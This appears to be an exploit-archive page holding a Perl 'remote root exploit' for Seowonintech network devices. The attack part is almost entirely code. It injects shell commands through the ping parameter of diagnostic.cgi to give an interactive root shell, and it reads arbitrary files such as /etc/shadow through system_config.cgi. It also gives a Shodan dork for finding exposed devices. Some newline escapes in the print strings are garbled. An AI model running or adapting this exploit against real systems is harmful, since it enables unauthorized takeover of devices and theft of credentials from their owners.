[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Seowonintech Devices - Remote root Exploit
# Published : 2013-06-24
# Author :
# Previous Title : Bifrost 1.2d - Remote Buffer Overflow
# Next Title : LibrettoCMS File Manager Arbitary File Upload Vulnerability


#!/usr/bin/perl
#       
#  [+] Seowonintech all device remote root exploit v2
# =====================================================
# author:                 | email:
# Todor Donev  (latin)    | todor dot donev 
# ???e ???a  (cyrillic) | @googlemail.com    
# =====================================================
# type:    | platform:    | description:
# remote   | linux        | attacker can get root
# hardware | seowonintech | access on the device
# =====================================================
# greetings to:
# Stiliyan Angelov,Tsvetelina Emirska,all elite 
# colleagues and all my friends that support me. 
# =====================================================
# warning:
# Results about 37665 possible vulnerabilities
# from this exploit.
# =====================================================
# shodanhq dork: 
# thttpd/2.25b 29dec2003 Content-Length: 386 Date: 2013
# =====================================================
# P.S. Sorry for buggy perl.. :)
# 2o13 Hell yeah from Bulgaria, Sofia
#
#    Stop Monsanto Stop Monsanto Stop Monsanto
#
#       FREE GOTTFRID SVARTHOLM WARG FREE
# GOTTFRID SVARTHOLM WARG is THEPIRATEBAY co-founder 
# who was sentenced to two years in jail by Nacka 
# district court, Sweden on 18.06.2013 for hacking into
# computers at a company that manages data for Swedish
# authorities and making illegal online money transfers.
 
use LWP::Simple qw/$ua get/;
my $host  =  $ARGV[0] =~ /^http:/// ?  $ARGV[0]:  'http://' . $ARGV[0];
if(not defined $ARGV[0])
{
     usg();
     exit;
}
print "[+] Seowonintech all device remote root exploitn";
$diagcheck = $host."/cgi-bin/diagnostic.cgi";
$syscheck = $host."/cgi-bin/system_config.cgi";
$res = $ua->get($diagcheck) || die "[-] Error: $!n";
print "[+] Checking before attack..n";
if($res->status_line != 200){
     print "[+] diagnostic.cgi Status: ".$res->status_line."n";
     }else{
     print "[o] Victim is ready for attack.n";
     print "[o] Status: ".$res->status_line."n";  
     if(defined $res =~ m{selected>4</option>}sx){
     print "[+] Connected to $ARGV[0]n";
     print "[+] The fight for the future Beginsn";
     print "[+] Exploiting via remote command execution..n";
     print "[+] Permission granted, old friend.n";
     &rce;
     }else{
     print "[!] Warning: possible vulnerability.n";
     exit;
    }   
  }
$res1 = $ua->get($syscheck) || die "[-] Error: $!n";
if($res1->status_line != 200){
     print "[+] system_config.cgi Status: ".$res1->status_line."n";
     exit;
     }else{
     print "[+] Trying to attack via remote file disclosure release.n";
     if(defined $syscheck =~ s/value='/etc/'//gs){
     print "[+] Victim is ready for attack.n";
     print "[+] Connected to $ARGV[0]n";
     print "[o] Follow the white cat.n";
     print "[+] Exploiting via remote file dislocure..n";
     print "[+] You feeling lucky, Neo?n";
     &rfd;
     }else{
     print "[!] Warning: Possible vulnerability. Believe the unbelievable!n";
     exit;
    }
  }
sub rfd{
while(1){ 
     print "# cat ";
     chomp($file=<STDIN>);
     if($file eq ""){ print "Enter full path to file!n"; }
     $bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY";
     $data=get($bug) || die "[-] Error: $ARGV[0] $!n";
     $data =~ s/Null/File not found!/gs;
     if (defined $data =~ m{rows="30">(.*?)&lt;/textarea&gt;}sx){
     print $1."n";
     }
   }
}
sub rce{
while(1){ 
     print "# ";
     chomp($rce=<STDIN>);
     $bug = $host."/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;".$rce.";&ping_count=1&action=Apply&html_view=ping";
     $rce =~ s/|/;/;
     if($rce eq ""){print "enter Linux commandn";}
     if($rce eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
     if($rce eq "exit" || $rce eq "quit"){print "There is no spoon...n"; exit;}
     $data=get($bug) || die "[-] Error: $!n";
     if (defined $data =~ m{(s.*) Content-type:}sx){
     $result = substr $1, index($1, ' loss') or substr $1, index($1, ' ms');
     $result =~ s/ lossn//;     
     $result =~ s/ msn//;
     print $result;
    }
  }
}
sub usg
{
     print " [+] Seowonintech all device remote root exploitn";
     print " [!] by Todor Donev todor dot donev @ googlemail.comn";
     print " [?] usg: perl $0 <victim>n";
     print " [?] exmp xpl USG: perl $0 192.168.1.1 :)n";
     print " [1] exmp xpl RCE: # uname -a :)n";
     print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd :Pn";
}